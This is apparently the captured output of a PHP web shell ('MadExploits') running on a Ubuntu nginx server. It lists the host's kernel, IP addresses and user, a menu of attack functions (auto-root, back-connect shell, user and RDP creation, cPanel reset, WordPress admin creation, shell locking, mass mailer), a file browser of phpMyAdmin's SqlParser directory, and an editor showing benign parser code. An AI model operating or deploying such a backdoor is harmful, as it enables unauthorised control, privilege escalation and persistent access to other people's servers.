Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
php /
PhpMyAdmin /
SqlParser /
[ HOME SHELL ]
Name
Size
Permission
Action
Components
[ DIR ]
drwxr-xr-x
Contexts
[ DIR ]
drwxr-xr-x
Exceptions
[ DIR ]
drwxr-xr-x
Statements
[ DIR ]
drwxr-xr-x
Tools
[ DIR ]
drwxr-xr-x
Utils
[ DIR ]
drwxr-xr-x
Component.php
2.05
KB
-rw-r--r--
Context.php
18.84
KB
-rw-r--r--
Core.php
1004
B
-rw-r--r--
Lexer.php
32.97
KB
-rw-r--r--
Parser.php
20.78
KB
-rw-r--r--
Statement.php
17.77
KB
-rw-r--r--
Token.php
9.32
KB
-rw-r--r--
TokensList.php
4.51
KB
-rw-r--r--
Translator.php
1.57
KB
-rw-r--r--
UtfString.php
4.91
KB
-rw-r--r--
autoload.php
8.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Component.php
<?php /** * Defines a component that is later extended to parse specialized components or * keywords. * * There is a small difference between *Component and *Keyword classes: usually, * *Component parsers can be reused in multiple situations and *Keyword parsers * count on the *Component classes to do their job. */ declare(strict_types=1); namespace PhpMyAdmin\SqlParser; use Exception; /** * A component (of a statement) is a part of a statement that is common to * multiple query types. */ abstract class Component { /** * Parses the tokens contained in the given list in the context of the given * parser. * * @param Parser $parser the parser that serves as context * @param TokensList $list the list of tokens that are being parsed * @param array $options parameters for parsing * * @return mixed * * @throws Exception not implemented yet. */ public static function parse( Parser $parser, TokensList $list, array $options = [] ) { // This method should be abstract, but it can't be both static and // abstract. throw new Exception(Translator::gettext('Not implemented yet.')); } /** * Builds the string representation of a component of this type. * * In other words, this function represents the inverse function of * `static::parse`. * * @param mixed $component the component to be built * @param array $options parameters for building * * @return mixed * * @throws Exception not implemented yet. */ public static function build($component, array $options = []) { // This method should be abstract, but it can't be both static and // abstract. throw new Exception(Translator::gettext('Not implemented yet.')); } /** * Builds the string representation of a component of this type. * * @see static::build * * @return string */ public function __toString() { return static::build($this); } }
Close